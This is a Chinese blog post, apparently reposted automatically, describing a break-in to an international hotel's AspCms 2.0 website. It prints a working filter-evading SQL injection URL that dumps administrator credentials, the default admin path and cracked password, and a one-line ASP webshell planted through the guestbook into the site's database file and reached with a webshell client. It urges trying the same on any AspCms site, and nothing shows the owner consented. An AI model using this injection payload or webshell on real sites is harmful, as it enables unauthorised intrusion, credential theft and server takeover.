这是某个国际酒店的网站,由于使用了AspCms 2.0,通过SQL注入我们很快可以拿下shell

此次测试中,由于网站限制了所有的读写权限,由各种错误,以及最后的小马根本没什么权限。

[渗透实战]某国际酒店测试

0x01 基础信息:

简单看看指纹信息:

[渗透实战]某国际酒店测试

是ASPCMS的,通过一个通用SQL注入拿到管理员的账号密码:

EXP:

https://blog.dyboy.cn/plug/comment
/commentList.asp?id=0%20unmasterion%20
semasterlect%20top%201%20UserID,GroupID,
LoginName,Password,now%28%29,null,1%20%20
frmasterom%20%7bprefix%7duser

利用EXP直接获得:

[渗透实战]某国际酒店测试

解密得到管理员

账号:admin

密码:123456

0x02 深入测试:

后台默认为: https://blog.dyboy.cn/admin_aspcms/

登陆管理后台

[渗透实战]某国际酒店测试

根据以前的添加模版的方法不可行,再多看几下,发现整个网站是没有写入权限的…

这里要提一个东西就是aspcms默认的留言板数据库路径:
https://blog.dyboy.cn/data/data.asp

有的我们在留言板留言一句话

┼攠數畣整爠煥敵瑳∨≡┩愾
密码:a
菜刀连接 https://blog.dyboy.cn/data/data.asp 即可

因为整个网站都没有写的权限,应该这个网站之前就有被入侵的经历吧,所以做了限制,找到备份文件的地方,尝试了一下,虽然显示成功备份,事实上不能备份。

因为不能直接下载备份文件,就直接访问备份文件,发现一个有趣的东西:

[渗透实战]某国际酒店测试

有一个 execute 语句,大家应该有所想法的

然后死马当活马医,直接菜刀链接备份数据库文件,猜测密码为a,因为数据库文件比较大,所以每次的操作都会消耗较长的时间

然后就这么就连上了…

[渗透实战]某国际酒店测试

前面也说了整个网站都没权限,鸡肋shell一个。

0x03 总结:

shell是否有权限不重要,aspcms的都可以这么黑盒测试

提供一下这个 ASPcms 2.0 的源码下载地址:

http://down.admin5.com/asp/73162.html

空闲有能力的朋友可以审计一下,ASP的我就会一句话[捂脸]…

该文章由WP-AutoPost插件自动采集发布

原文地址:https://blog.dyboy.cn/websecurity/49.html